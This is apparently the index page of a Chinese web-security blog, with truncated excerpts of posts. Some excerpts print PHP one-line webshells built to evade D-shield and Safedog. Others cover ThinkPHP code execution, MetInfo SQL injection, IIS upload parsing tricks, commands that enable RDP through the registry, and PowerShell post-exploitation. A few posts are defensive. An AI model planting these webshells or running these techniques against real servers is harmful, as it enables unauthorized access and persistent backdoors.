三个过D盾安全狗PHP一句话
一 <!--?php function a(){ return $a=$_POST['1']; } @assert(a()); ?-->二<--?php $x='$_PO'."STasdasd[".'1]'; $x = $x.str……
PHP利用Apache、Nginx的特性实现免杀Webshell
通过get_defined_vars()、getallheaders()这两个函数来构造我们的webshell。环境函数利用nginxget_defined_vars()返回由所有已定义变量所组成的数组apachegetallheaders()获取全部 HTTP 请求头信息apache环境<?phpeval……
GOLANG实现的wget
效果:代码package mainimport ( "fmt" "io" "net/http" "os")var url, path stringfunc main() { if len(os.Args) != 3 { ……
Thinkphp5.1 ~ 5.2 全版本代码执行
序言最近爆出了Thinkphp5.0.*全版本代码执行,其中5.1与5.2全版本在生产环境下下同样也存在代码执行漏洞分析:文件位置:\thinkphp\library\think\Request.php /** * 当前的请求类型 * @access public * @param bool $origi……
BurpSuite 1.6~2.x版本汉化版工具
0x0 介绍Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。为什么要汉化?做为一个半路出家英语不好的人时常不认识某些单词而烦恼,当然这里只是针对自己做评价,大佬众多,如果英……
Nishang/PowerSploit工具脚本
nishang/powersploit都是针对powershell的渗透工具,提供了丰富powershell脚本,在后渗透的时候,不需要在靶机上上传任何工具,只要一个powershell,就可以远程下载执行脚本1.Powershell查看执行策略Get-ExecutionPolicyRestricted //这是默认的设置。不……
cmd开启3389端口+windows提权对照表
win2003:wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1win2003 、winxp:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "……
web容器上传文件利用方式总结
1.IIS 6.01.IIS 6.01)在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。/1.asp/1.jpg2)分号后面的不被解析 1.asp;.jpg3)IIS6.0 默认的可执行文件除了asp还包含asa,cer,cdx2.IIS写权限用curl -……
BlobRunner一款功能强大的恶意软件Shellcode调试与分析工具
今天给大家介绍的是一款名叫BlobRunner的安全分析工具,广大研究人员可以在恶意软件的分析过程中使用BlobRunner快速提取和调试恶意软件中的shellcode。BlobRunner能够直接在内存中定位目标文件,并跳转到内存地址(可设置偏移量或基地址)。这样一来,研究人员就能够以最简单最快速的方法去对提取出的恶意代码进行调试和分析了。为了使用……
Metinfo6.0.0-6.1.2前台注入漏洞
这个前台注入漏洞存在已久,从MetInfo发布的6.0版本就存在,且后来官方的修复代码,也可以直接绕过。笔者于7月份提交了当时最新 MetInfo 6.1.0版本SQL注入漏洞,该漏洞直到6.1.3版本才被修复。如下漏洞分析,权当思路分享。漏洞分析2018-1-29, MetInfo官方重写后台及前台代码,并发布了MetInfo6.0。然而这一新版代……
Centos7 防火墙 firewalld 实用操作
一.前言Centos7以上的发行版都试自带了firewalld防火墙的,firewalld去带了iptables防火墙。其原因是iptables的防火墙策略是交由内核层面的netfilter网络过滤器来处理的,而firewalld则是交由内核层面的nftables包过滤框架来处理。 相较于iptables防火墙而言,firewalld支持动态更新技术并……
mkcert – 0 配置,为 localhost 127.0.0.1 自签发安全证书
localhost 127.0.0.1 是开发人员常用的两个本地主机地址,如果想要给他们俩签发浏览器安全证书,要涉及一些神秘的命令行以及专业知识。而在 macOS 与 Linux 上使用 mkcert 则可以 0 配置为他们俩签发并安装证书,并且还能将证书拿给其他系统使用。真证书签发机构不太可能为你签发 Localhost 与 127.0.0.1 的证书……
![CTF中if (md5(md5($_GET[‘a’])) == md5($_GET[‘b’])) 的绕过](https://www.52ziji.cn/wp-content/themes/Git-alpha/timthumb.php?src=/wp-content/uploads/2018/10/2018102805062923.png&h=169&w=253&q=90&zc=1&ct=1)
CTF中if (md5(md5($_GET[‘a’])) == md5($_GET[‘b’])) 的绕过
CTF中md5判等可使用0e绕过,但是如果是双md5该如何绕过呢?本文将教你如何绕过md5(md5($_GET[‘a’])) == md5($_GET[b’])。0x01 引言在php中,所有变量都是若类型的,在使用if判等的时候要格外小心,使用特殊的参数可能会使本来不相等的if判断位相等,比如下面的例子。1234567……
网站要怎么防止SQL注入
一、SQL注入简介SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库。二、SQL注入攻击的总体思路1.寻找到SQL注入的位置2.判断服务器类型和后台数据库类型3.针对不通的服务器和数据库特点进行SQL注入攻击 三、SQL注入攻击实……
WEB安全漏洞之CSRF
什么是 CSRF在了解 CSRF 之前我们需要科普两个前提。首先是登录权限验证的方式有很多种,目前绝大多数网站采用的还是 session 会话任务的方式。session 机制简单的来说就是服务端使用一个键值对记录登录信息,同时在 cookie 中将 session id(即刚才说的键)存储到 cookie 中。另外我们又知道浏览器中 HTTP(s) 请……
校园网绕过Drcom安装自动登录程序到路由器
简单记录一下,怎么在路由器上安装drcom脚本,实现自动登陆,一个路由器,全寝室都可以使用的方法。安装固件:我这里使用的是 newifi mini 型号的路由器固件下载地址:http://downloads.openwrt.org.cn/PandoraBox/Lenovo-Y1_RY-1S/firmware/stable/PandoraBox-rali……